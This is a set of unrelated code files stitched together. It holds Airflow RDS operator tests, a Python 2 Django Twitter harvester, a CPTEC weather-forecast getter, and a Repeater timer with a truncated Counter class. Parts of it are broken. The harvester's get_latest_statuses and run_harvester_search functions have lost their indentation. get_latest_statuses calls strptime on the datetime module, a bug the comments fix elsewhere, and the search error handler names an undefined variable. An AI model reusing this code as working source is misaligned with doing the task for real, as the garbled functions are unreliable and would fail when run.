    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_cancel_export_task(self):
        """Cancelling a running export task moves it to the 'canceled' status."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        _start_export_task(self.hook)
        cancel_export_operator = RdsCancelExportTaskOperator(
            task_id="test_cancel",
            export_task_identifier=EXPORT_TASK_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(cancel_export_operator.hook)
        cancel_export_operator.execute(None)
        result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
        export_tasks = result.get("ExportTasks")
        assert export_tasks
        assert len(export_tasks) == 1
        assert export_tasks[0]["Status"] == "canceled"

    @mock_rds
    @patch.object(RdsHook, "wait_for_export_task_state")
    def test_cancel_export_task_no_wait(self, mock_await_status):
        """With wait_for_completion=False the export-task wait helper is skipped."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        _start_export_task(self.hook)
        cancel_export_operator = RdsCancelExportTaskOperator(
            task_id="test_cancel_no_wait",
            export_task_identifier=EXPORT_TASK_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(cancel_export_operator.hook)
        cancel_export_operator.execute(None)
        result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
        export_tasks = result.get("ExportTasks")
        assert export_tasks
        assert len(export_tasks) == 1
        assert export_tasks[0]["Status"] == "canceled"
        mock_await_status.assert_not_called()
class TestRdsCreateEventSubscriptionOperator:
    """Tests for RdsCreateEventSubscriptionOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_create_event_subscription(self):
        """Creating a subscription yields exactly one active subscription."""
        _create_db_instance(self.hook)
        create_subscription_operator = RdsCreateEventSubscriptionOperator(
            task_id="test_create",
            subscription_name=SUBSCRIPTION_NAME,
            sns_topic_arn=SUBSCRIPTION_TOPIC,
            source_type="db-instance",
            source_ids=[DB_INSTANCE_NAME],
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(create_subscription_operator.hook)
        create_subscription_operator.execute(None)
        result = self.hook.conn.describe_event_subscriptions(SubscriptionName=SUBSCRIPTION_NAME)
        subscriptions = result.get("EventSubscriptionsList")
        assert subscriptions
        assert len(subscriptions) == 1
        assert subscriptions[0]["Status"] == "active"

    @mock_rds
    @patch.object(RdsHook, "wait_for_event_subscription_state")
    def test_create_event_subscription_no_wait(self, mock_await_status):
        """With wait_for_completion=False the subscription wait helper is skipped."""
        _create_db_instance(self.hook)
        create_subscription_operator = RdsCreateEventSubscriptionOperator(
            task_id="test_create_no_wait",
            subscription_name=SUBSCRIPTION_NAME,
            sns_topic_arn=SUBSCRIPTION_TOPIC,
            source_type="db-instance",
            source_ids=[DB_INSTANCE_NAME],
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(create_subscription_operator.hook)
        create_subscription_operator.execute(None)
        result = self.hook.conn.describe_event_subscriptions(SubscriptionName=SUBSCRIPTION_NAME)
        subscriptions = result.get("EventSubscriptionsList")
        assert subscriptions
        assert len(subscriptions) == 1
        assert subscriptions[0]["Status"] == "active"
        mock_await_status.assert_not_called()
class TestRdsDeleteEventSubscriptionOperator:
    """Tests for RdsDeleteEventSubscriptionOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_delete_event_subscription(self):
        """Deleting a subscription makes any subsequent describe call fail."""
        _create_event_subscription(self.hook)
        delete_subscription_operator = RdsDeleteEventSubscriptionOperator(
            task_id="test_delete",
            subscription_name=SUBSCRIPTION_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(delete_subscription_operator.hook)
        delete_subscription_operator.execute(None)
        # Bug fix: this previously described EXPORT_TASK_NAME (copy-paste error),
        # which would raise regardless of the deletion, so the test verified nothing.
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_event_subscriptions(SubscriptionName=SUBSCRIPTION_NAME)
class TestRdsCreateDbInstanceOperator:
    """Tests for RdsCreateDbInstanceOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_create_db_instance(self):
        """Creating an instance leaves exactly one 'available' DB instance."""
        create_db_instance_operator = RdsCreateDbInstanceOperator(
            task_id="test_create_db_instance",
            db_instance_identifier=DB_INSTANCE_NAME,
            db_instance_class="db.m5.large",
            engine="postgres",
            rds_kwargs={
                "DBName": DB_INSTANCE_NAME,
            },
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(create_db_instance_operator.hook)
        create_db_instance_operator.execute(None)
        result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        db_instances = result.get("DBInstances")
        assert db_instances
        assert len(db_instances) == 1
        assert db_instances[0]["DBInstanceStatus"] == "available"

    @mock_rds
    @patch.object(RdsHook, "wait_for_db_instance_state")
    def test_create_db_instance_no_wait(self, mock_await_status):
        """With wait_for_completion=False the instance-state wait helper is skipped."""
        create_db_instance_operator = RdsCreateDbInstanceOperator(
            task_id="test_create_db_instance_no_wait",
            db_instance_identifier=DB_INSTANCE_NAME,
            db_instance_class="db.m5.large",
            engine="postgres",
            rds_kwargs={
                "DBName": DB_INSTANCE_NAME,
            },
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(create_db_instance_operator.hook)
        create_db_instance_operator.execute(None)
        result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        db_instances = result.get("DBInstances")
        assert db_instances
        assert len(db_instances) == 1
        assert db_instances[0]["DBInstanceStatus"] == "available"
        mock_await_status.assert_not_called()
class TestRdsDeleteDbInstanceOperator:
    """Tests for RdsDeleteDbInstanceOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_delete_db_instance(self):
        """Deleting an instance makes any subsequent describe call fail."""
        _create_db_instance(self.hook)
        delete_db_instance_operator = RdsDeleteDbInstanceOperator(
            task_id="test_delete_db_instance",
            db_instance_identifier=DB_INSTANCE_NAME,
            rds_kwargs={
                "SkipFinalSnapshot": True,
            },
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(delete_db_instance_operator.hook)
        delete_db_instance_operator.execute(None)
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)

    @mock_rds
    @patch.object(RdsHook, "wait_for_db_instance_state")
    def test_delete_db_instance_no_wait(self, mock_await_status):
        """With wait_for_completion=False the instance-state wait helper is skipped."""
        _create_db_instance(self.hook)
        delete_db_instance_operator = RdsDeleteDbInstanceOperator(
            task_id="test_delete_db_instance_no_wait",
            db_instance_identifier=DB_INSTANCE_NAME,
            rds_kwargs={
                "SkipFinalSnapshot": True,
            },
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(delete_db_instance_operator.hook)
        delete_db_instance_operator.execute(None)
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        mock_await_status.assert_not_called()
class TestRdsStopDbOperator:
    """Tests for RdsStopDbOperator (instance and cluster modes, snapshots, deferral)."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    @patch.object(RdsHook, "wait_for_db_instance_state")
    def test_stop_db_instance(self, mock_await_status):
        """Stopping an instance reaches 'stopped' and invokes the wait helper."""
        _create_db_instance(self.hook)
        stop_db_instance = RdsStopDbOperator(task_id="test_stop_db_instance", db_identifier=DB_INSTANCE_NAME)
        _patch_hook_get_connection(stop_db_instance.hook)
        stop_db_instance.execute(None)
        result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        status = result["DBInstances"][0]["DBInstanceStatus"]
        assert status == "stopped"
        mock_await_status.assert_called()

    @mock_rds
    @patch.object(RdsHook, "wait_for_db_instance_state")
    def test_stop_db_instance_no_wait(self, mock_await_status):
        """With wait_for_completion=False the instance still stops but no wait occurs."""
        _create_db_instance(self.hook)
        stop_db_instance = RdsStopDbOperator(
            task_id="test_stop_db_instance_no_wait", db_identifier=DB_INSTANCE_NAME, wait_for_completion=False
        )
        _patch_hook_get_connection(stop_db_instance.hook)
        stop_db_instance.execute(None)
        result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        status = result["DBInstances"][0]["DBInstanceStatus"]
        assert status == "stopped"
        mock_await_status.assert_not_called()

    @mock.patch.object(RdsHook, "conn")
    def test_deferred(self, conn_mock):
        """deferrable=True raises TaskDeferred carrying an RdsDbStoppedTrigger."""
        op = RdsStopDbOperator(
            task_id="test_stop_db_instance_no_wait",
            db_identifier=DB_INSTANCE_NAME,
            deferrable=True,
        )
        with pytest.raises(TaskDeferred) as defer:
            op.execute({})
        assert isinstance(defer.value.trigger, RdsDbStoppedTrigger)

    @mock_rds
    def test_stop_db_instance_create_snapshot(self):
        """Passing db_snapshot_identifier stops the instance AND creates a snapshot."""
        _create_db_instance(self.hook)
        stop_db_instance = RdsStopDbOperator(
            task_id="test_stop_db_instance_create_snapshot",
            db_identifier=DB_INSTANCE_NAME,
            db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
        )
        _patch_hook_get_connection(stop_db_instance.hook)
        stop_db_instance.execute(None)
        describe_result = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        status = describe_result["DBInstances"][0]["DBInstanceStatus"]
        assert status == "stopped"
        snapshot_result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
        instance_snapshots = snapshot_result.get("DBSnapshots")
        assert instance_snapshots
        assert len(instance_snapshots) == 1

    @mock_rds
    @patch.object(RdsHook, "wait_for_db_cluster_state")
    def test_stop_db_cluster(self, mock_await_status):
        """Stopping a cluster reaches 'stopped' and invokes the cluster wait helper."""
        _create_db_cluster(self.hook)
        stop_db_cluster = RdsStopDbOperator(
            task_id="test_stop_db_cluster", db_identifier=DB_CLUSTER_NAME, db_type="cluster"
        )
        _patch_hook_get_connection(stop_db_cluster.hook)
        stop_db_cluster.execute(None)
        describe_result = self.hook.conn.describe_db_clusters(DBClusterIdentifier=DB_CLUSTER_NAME)
        status = describe_result["DBClusters"][0]["Status"]
        assert status == "stopped"
        mock_await_status.assert_called()

    @mock_rds
    def test_stop_db_cluster_create_snapshot_logs_warning_message(self, caplog):
        """db_snapshot_identifier is ignored for clusters and must emit a warning."""
        _create_db_cluster(self.hook)
        stop_db_cluster = RdsStopDbOperator(
            task_id="test_stop_db_cluster",
            db_identifier=DB_CLUSTER_NAME,
            db_type="cluster",
            db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
        )
        _patch_hook_get_connection(stop_db_cluster.hook)
        with caplog.at_level(logging.WARNING, logger=stop_db_cluster.log.name):
            stop_db_cluster.execute(None)
        warning_message = (
            "'db_snapshot_identifier' does not apply to db clusters. Remove it to silence this warning."
        )
        assert warning_message in caplog.text
class TestRdsStartDbOperator:
    """Tests for RdsStartDbOperator (instance and cluster modes, deferral)."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_start_db_instance(self):
        """Starting a stopped instance brings it back to 'available'."""
        _create_db_instance(self.hook)
        self.hook.conn.stop_db_instance(DBInstanceIdentifier=DB_INSTANCE_NAME)
        # Sanity check: the instance really is stopped before the operator runs.
        result_before = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        status_before = result_before["DBInstances"][0]["DBInstanceStatus"]
        assert status_before == "stopped"
        start_db_instance = RdsStartDbOperator(
            task_id="test_start_db_instance", db_identifier=DB_INSTANCE_NAME
        )
        _patch_hook_get_connection(start_db_instance.hook)
        start_db_instance.execute(None)
        result_after = self.hook.conn.describe_db_instances(DBInstanceIdentifier=DB_INSTANCE_NAME)
        status_after = result_after["DBInstances"][0]["DBInstanceStatus"]
        assert status_after == "available"

    @mock_rds
    def test_start_db_cluster(self):
        """Starting a stopped cluster brings it back to 'available'."""
        _create_db_cluster(self.hook)
        self.hook.conn.stop_db_cluster(DBClusterIdentifier=DB_CLUSTER_NAME)
        result_before = self.hook.conn.describe_db_clusters(DBClusterIdentifier=DB_CLUSTER_NAME)
        status_before = result_before["DBClusters"][0]["Status"]
        assert status_before == "stopped"
        start_db_cluster = RdsStartDbOperator(
            task_id="test_start_db_cluster", db_identifier=DB_CLUSTER_NAME, db_type="cluster"
        )
        _patch_hook_get_connection(start_db_cluster.hook)
        start_db_cluster.execute(None)
        result_after = self.hook.conn.describe_db_clusters(DBClusterIdentifier=DB_CLUSTER_NAME)
        status_after = result_after["DBClusters"][0]["Status"]
        assert status_after == "available"

    @mock.patch.object(RdsHook, "conn")
    def test_deferred(self, conn_mock):
        """deferrable=True raises TaskDeferred carrying an RdsDbAvailableTrigger."""
        op = RdsStartDbOperator(
            task_id="test_stop_db_instance_no_wait",
            db_identifier=DB_INSTANCE_NAME,
            deferrable=True,
        )
        with pytest.raises(TaskDeferred) as defer:
            op.execute({})
        assert isinstance(defer.value.trigger, RdsDbAvailableTrigger)
|
# coding=UTF-8
import twitter
import time
import datetime
import urllib
from twython.twython import TwythonError, TwythonAPILimit, TwythonAuthError, TwythonRateLimitError
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from snh.models.twittermodel import *
import snhlogger
logger = snhlogger.init_logger(__name__, "twitter.log")
def run_twitter_harvester():
    """Entry point: run one harvest pass for every configured TwitterHarvester.

    Legacy Python 2 module (print statements, unicode()); left as py2.
    """
    harvester_list = TwitterHarvester.objects.all()
    for harvester in harvester_list:
        harvester.update_client_stats()
        logger.info(u"The harvester %s is %s" %
                        (unicode(harvester),
                        "active" if harvester.is_active else "inactive"))
        # Rate-limited harvesters are only reported; they skip the REST pass below.
        if harvester.is_active and not harvester.remaining_hits > 0:
            logger.warning(u"The harvester %s is %s but has exceeded the rate limit. Need to wait? %s" %
                            (unicode(harvester),
                            "active" if harvester.is_active else "inactive",
                            harvester.get_stats()))
        if harvester.is_active and harvester.remaining_hits > 0:
            run_harvester_v2(harvester)
        # NOTE(review): the search pass runs even with 0 remaining REST hits —
        # presumably the search API has its own quota; confirm.
        if harvester.is_active:
            run_harvester_search(harvester)
def get_latest_statuses_page(harvester, user, page):
    """Fetch one timeline page (up to 200 statuses) for *user* via the harvester's API client.

    If the previous harvest of this user was aborted, resume from the last
    harvested status id by switching the since_id parameter to max_id.
    """
    since_max = [u"since_id", None]
    if user.was_aborted and user.last_harvested_status:
        since_max = [u"max_id", user.last_harvested_status.fid]
    latest_statuses_page = harvester.api_call("GetUserTimeline",
                        {
                            u"screen_name": unicode(user.screen_name),
                            since_max[0]: since_max[1],
                            u"include_rts": True,
                            u"include_entities": True,
                            u"count": 200,
                            u"page": page,
                        })
    return latest_statuses_page
def sleeper(retry_count):
    """Back off before a retry: one second per retry so far, capped at 60 s."""
    seconds_per_retry = 1
    delay = min(retry_count * seconds_per_retry, 60)
    time.sleep(delay)
def manage_exception(retry_count, harvester, user, page):
    """Log the current exception and bump the retry counter.

    Returns (new_retry_count, need_a_break) where need_a_break is True once
    the harvester's retry budget is exhausted.
    """
    logger.exception(
        u"Exception for the harvester %s for %s at page %d. Retry:%d"
        % (harvester, unicode(user), page, retry_count)
    )
    bumped = retry_count + 1
    return (bumped, bumped > harvester.max_retry_on_fail)
def manage_twitter_exception(retry_count, harvester, user, page, tex):
    """Classify a TwitterError *tex* and decide whether the caller should stop.

    Returns (new_retry_count, need_a_break). Re-raises on rate limiting so the
    whole harvest pass for this client aborts. The string comparison against
    the exception text is fragile but matches the twitter library in use.
    """
    retry_count += 1
    need_a_break = retry_count > harvester.max_retry_on_fail
    if unicode(tex) == u"Not found":
        # The account no longer exists: flag the user so future runs skip it.
        user.error_triggered = True
        user.save()
        need_a_break = True
        msg = u"Exception for the harvester %s for %s at page %d. Retry:%d. The user does not exists!" % (harvester, unicode(user), page, retry_count)
        logger.exception(msg)
    elif unicode(tex) == u"Capacity Error":
        # Transient Twitter-side overload: just retry.
        logger.debug(u"%s:%s:%d. Capacity Error. Retrying." % (harvester, unicode(user), page))
    elif unicode(tex).startswith(u"Rate limit exceeded"):
        harvester.update_client_stats()
        msg = u"Exception for the harvester %s for %s at page %d. Retry:%d." % (harvester, unicode(user), page, retry_count)
        logger.exception(msg)
        # Propagate so the harvest loop for this client stops entirely.
        raise
    elif unicode(tex) == u"{u'error': u'Invalid query'}" or unicode(tex) == u"Invalid query":
        logger.debug(u"%s:%s:%d. Invalid query. Breaking." % (harvester, unicode(user), page))
        need_a_break = True
    else:
        # Python 2 print statement (legacy codebase); also logged just below.
        print tex
        msg = u"Exception for the harvester %s for %s at page %d. Retry:%d. %s" % (harvester, unicode(user), page, retry_count, tex)
        logger.exception(msg)
    return (retry_count, need_a_break)
def get_latest_statuses(harvester, user):
page = 1
retry = 0
lsp = []
latest_statuses = []
too_old = False
while not too_old:
try:
logger.debug(u"%s:%s(%d):%d" % (harvester, unicode(user), user.fid if user.fid else 0, page))
lsp = get_latest_statuses_page(harvester, user, page)
if len(lsp) != 0:
for status in lsp:
status_time = datetime.strptime(status.created_at,'%a %b %d %H:%M:%S +0000 %Y')
if status_time > harvester.harvest_window_from and \
status_time < harvester.harvest_window_to:
update_user_status(status, user)
if status_time < harvester.harvest_window_from:
too_old = True
break
else:
break
page = page + 1
retry = 0
except twitter.TwitterError, tex:
(retry, need_a_break) = manage_twitter_exception(retry, harvester, user, page, tex)
if need_a_break:
break
else:
sleeper(retry)
except:
(retry, need_a_break) = manage_exception(retry, harvester, user, page)
if need_a_break:
break
else:
sleeper(retry)
return latest_statuses
def update_user_status(status, user):
    """Create or refresh the TWStatus row for *status* and mark it as the
    user's most recently harvested status. Errors are logged, never raised.
    """
    try:
        try:
            tw_status = TWStatus.objects.get(fid__exact=status.id)
        except ObjectDoesNotExist:
            # First sighting of this status: create the row before updating it.
            tw_status = TWStatus(user=user)
            tw_status.save()
        tw_status.update_from_twitter(status, user)
        user.last_harvested_status = tw_status
        user.save()
    except:
        # Best-effort: a single bad status must not abort the harvest run.
        msg = u"Cannot update status %s for %s:(%d)" % (unicode(status), unicode(user), user.fid if user.fid else 0)
        logger.exception(msg)
def get_existing_user(param):
    """Return the TWUser matching the ORM filter *param*, or None.

    If the database holds duplicates, return the first match and log a warning.
    """
    try:
        return TWUser.objects.get(**param)
    except MultipleObjectsReturned:
        first_match = TWUser.objects.filter(**param)[0]
        logger.warning(u"Duplicated user in DB! %s, %s" % (first_match, first_match.fid))
        return first_match
    except ObjectDoesNotExist:
        return None
def status_from_search(harvester, tw_status):
    """Persist one raw search-API result *tw_status* (a dict) as a TWStatus.

    Looks the author up by id, then by screen name, creating a TWUser if
    neither exists. Returns the TWStatus, or None if persisting failed.
    """
    user = None
    snh_status = None
    try:
        user = get_existing_user({"fid__exact": tw_status["from_user_id"]})
        if not user:
            user = get_existing_user({"screen_name__exact": tw_status["from_user"]})
        if not user:
            user = TWUser(
                            fid=tw_status["from_user_id"],
                            screen_name=tw_status["from_user"],
                        )
            user.save()
            logger.info(u"New user created in status_from_search! %s", user)
        try:
            snh_status = TWStatus.objects.get(fid__exact=tw_status["id"])
        except ObjectDoesNotExist:
            snh_status = TWStatus(
                            fid=tw_status["id"],
                            user=user,
                            )
            snh_status.save()
        snh_status.update_from_rawtwitter(tw_status, user)
    except:
        # Best-effort: a single bad result must not abort the search run.
        msg = u"Cannot update status %s for user %s:%s)" % (unicode(tw_status), unicode(tw_status["from_user"]), unicode(tw_status["from_user_id"]))
        logger.exception(msg)
    return snh_status
def update_search(snh_search, snh_status):
    """Attach *snh_status* to *snh_search* (once) and record it as the latest hit."""
    if not snh_status:
        return
    already_linked = snh_search.status_list.filter(fid__exact=snh_status.fid).count() != 0
    if not already_linked:
        snh_search.status_list.add(snh_status)
        snh_search.latest_status_harvested = snh_status
        snh_search.save()
def call_search(harvester, term, page, since_id=None):
    """Run one page of the plain search API for *term*.

    Returns (status_list, next_page). NOTE(review): next_page is never set to
    False here, so pagination is terminated only by the callers; confirm this
    is intentional. NOTE(review): if the API response lacks "results" and no
    exception is raised, this loops forever re-issuing the call.
    """
    retry = 0
    status_list = None
    next_page = True
    while status_list is None:
        try:
            # Python 2 urllib: percent-encode the term, then strip the "k=" prefix.
            uniterm = urllib.urlencode({"k": term.encode('utf-8')}).split("=")[1:][0]
            params = { u"parameters": {
                                    u"q": uniterm,
                                    u"since_id": since_id,
                                    u"rpp": u"100",
                                    u"page": u"%d" % page,
                                    u"include_rts": u"true",
                                    u"include_entities": u"true",
                                    }
                                }
            logger.info(u"Getting new page:%d retry:%d, params:%s" % (page, retry, params))
            data = harvester.api_call(u"GetPlainSearch", params)
            if "results" in data:
                status_list = data["results"]
        except twitter.TwitterError, tex:
            (retry, need_a_break) = manage_twitter_exception(retry, harvester, term, page, tex)
            if need_a_break:
                # Give up on this page: return an empty result set.
                status_list = []
                break
            else:
                sleeper(retry)
    logger.info(u"Next page for %s: %s Hits to go: %d, len:%d" % (term, harvester, harvester.remaining_hits, len(status_list)))
    return status_list, next_page
def search_term(harvester, twsearch):
    """Harvest all search results for *twsearch* newer than its last hit and
    inside the harvester's harvest window.
    """
    page = 1
    too_old = False
    since_id = None
    if twsearch.latest_status_harvested is not None:
        since_id = unicode(twsearch.latest_status_harvested.fid)
    status_list, next_page = call_search(harvester, twsearch.term, page, since_id)
    while status_list and not too_old:
        page += 1
        for status in status_list:
            # Bug fix: this module does `import datetime` (the module), so the
            # old `datetime.strptime(...)` raised AttributeError. Use the class.
            status_time = datetime.datetime.strptime(status["created_at"], '%a, %d %b %Y %H:%M:%S +0000')
            if status_time > harvester.harvest_window_from and \
               status_time < harvester.harvest_window_to:
                snh_status = status_from_search(harvester, status)
                update_search(twsearch, snh_status)
            if status_time < harvester.harvest_window_from or not next_page:
                too_old = True
                break
        logger.info(u"last status date: %s" % status_time)
        if next_page:
            status_list, next_page = call_search(harvester, twsearch.term, page, since_id)
def para_search_term(harvester, all_twsearch):
    """Harvest every search in *all_twsearch* round-robin, one page per search
    per round, until no search has more pages.
    """
    searches = []
    for twsearch in all_twsearch:
        since_id = None
        if twsearch.latest_status_harvested is not None:
            since_id = unicode(twsearch.latest_status_harvested.fid)
        searches.append({
                        "twsearch": twsearch,
                        "page": 1,
                        "has_more": True,
                        "since_id": since_id,
                        })
    new_page_in_the_box = True
    while new_page_in_the_box:
        new_page_in_the_box = False
        for search in searches:
            if search["has_more"]:
                new_page_in_the_box = True
                logger.info(u"Will search for %s at page %d, since_id:%s" % (search["twsearch"].term, search["page"], search["since_id"]))
                status_list, has_more = call_search(harvester, search["twsearch"].term, search["page"], search["since_id"])
                search["page"] += 1
                search["has_more"] = has_more
                status_time = None
                for status in status_list:
                    # Bug fix: this module does `import datetime` (the module),
                    # so the old `datetime.strptime(...)` raised AttributeError.
                    status_time = datetime.datetime.strptime(status["created_at"], '%a, %d %b %Y %H:%M:%S +0000')
                    if status_time > harvester.harvest_window_from and \
                       status_time < harvester.harvest_window_to:
                        snh_status = status_from_search(harvester, status)
                        update_search(search["twsearch"], snh_status)
                    if status_time < harvester.harvest_window_from:
                        search["has_more"] = False
                        break
                # An empty page also ends pagination for this search.
                if status_time is None or len(status_list) == 0:
                    search["has_more"] = False
                logger.info(u"last status date: %s" % status_time)
def update_user_twython(twuser, user):
    """Refresh *user* from the raw twython payload *twuser*; log-and-continue on failure."""
    try:
        user.update_from_rawtwitter(twuser, twython=True)
    except:
        fallback_fid = user.fid if user.fid else 0
        logger.exception(u"Cannot update user info for %s:(%d)" % (unicode(twuser), fallback_fid))
def update_users_twython(harvester):
    """Bulk-refresh profile data for all of the harvester's users via twython.

    Users are looked up by screen name in batches; the upper-cased screen name
    maps the API response back to the local TWUser row.
    """
    all_users = harvester.twusers_to_harvest.all()
    screen_names = []
    user_screen_name = {}
    for user in all_users:
        screen_names.append(user.screen_name)
        user_screen_name[user.screen_name.upper()] = user
    # NOTE(review): 100 presumably matches the bulk-lookup API limit — confirm.
    step_size = 100
    split_screen_names = [screen_names[i:i+step_size] for i in range(0, len(screen_names), step_size)]
    # NOTE: the loop variable deliberately reuses (shadows) `screen_names`.
    for screen_names in split_screen_names:
        tt = harvester.get_tt_client()
        twuser_list_page = tt.bulkUserLookup(screen_names=screen_names, include_entities="true")
        logger.info(u"Twython hit to go: %d" % (tt.getRateLimitStatus()["remaining_hits"]))
        for twuser in twuser_list_page:
            screen_name = twuser["screen_name"].upper()
            user = user_screen_name[screen_name]
            update_user_twython(twuser, user)
def run_harvester_v2(harvester):
    """Run one REST-API harvest pass: refresh user profiles, then pull each
    user's timeline until users or rate-limit hits run out.
    """
    harvester.start_new_harvest()
    logger.info(u"START REST: %s Stats:%s" % (harvester, unicode(harvester.get_stats())))
    try:
        # `if True:` blocks look like leftover feature toggles; kept as-is.
        if True:
            update_users_twython(harvester)
        if True:
            user = harvester.get_next_user_to_harvest()
            while user and harvester.remaining_hits > 0:
                if not user.error_triggered:
                    logger.info(u"Start: %s:%s(%d). Hits to go: %d" % (harvester, unicode(user), user.fid if user.fid else 0, harvester.remaining_hits))
                    get_latest_statuses(harvester, user)
                else:
                    logger.info(u"Skipping: %s:%s(%d) because user has triggered the error flag." % (harvester, unicode(user), user.fid if user.fid else 0))
                user.was_aborted = False
                user.save()
                user = harvester.get_next_user_to_harvest()
    except twitter.TwitterError:
        # Rate limit re-raised from manage_twitter_exception: refresh counters and stop.
        harvester.update_client_stats()
    finally:
        harvester.end_current_harvest()
        # Remember an interrupted user so the next run resumes from max_id.
        if harvester.last_user_harvest_was_aborted:
            aborted_user = harvester.get_current_harvested_user()
            aborted_user.was_aborted = True
            aborted_user.save()
        logger.info(u"End REST: %s Stats:%s" % (harvester, unicode(harvester.get_stats())))
def run_harvester_search(harvester):
if True:
harvester.start_new_harvest()
logger.info(u"START SEARCH API: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
try:
all_twsearch = harvester.twsearch_to_harvest.all()
para_search_term(harvester, all_twsearch)
except twitter.TwitterError, e:
msg = u"ERROR for %s" % twsearch.term
logger.exception(msg)
finally:
harvester.end_current_harvest()
logger.info(u"End SEARCH API: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
logger.info(u"End: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
|
from api.sources.getter_definition import GetterDefinition
class CptecAPIGetter(GetterDefinition):
    """Getter for the CPTEC/INPE 7-day city forecast XML service."""

    def __init__(self, latitude, longitude):
        """Configure the base getter with the CPTEC endpoint and XML parser."""
        settings = {
            'url': 'http://servicos.cptec.inpe.br/XML/cidade/7dias/{0}/{1}/previsaoLatLon.xml',
            'parser': 'xml',
        }
        GetterDefinition.__init__(self, settings, latitude, longitude)
|
#!/usr/bin/python3
from threading import Timer
class Repeater(Timer):
    """A threading.Timer that re-fires every ``interval`` seconds until cancelled."""

    def run(self):
        # finished.wait() returns True once the event is set (i.e. cancel()
        # was called); until then it times out every `interval` seconds and
        # we invoke the callback with the stored args.
        while True:
            if self.finished.wait(self.interval):
                break
            self.function(*self.args, **self.kwargs)
class Counter:
    """An up/down counter clocked on rising edges.

    ``direction`` selects whether a rising clock edge increments (UP) or
    decrements (DOWN) the count; ``get`` exposes individual bits 0-31.
    """
    UP = 1
    DOWN = 0

    def __init__(self):
        self.count = 0            # current counter value
        self.clk = 0              # last seen clock level, for edge detection
        self.direction = self.UP  # counting direction

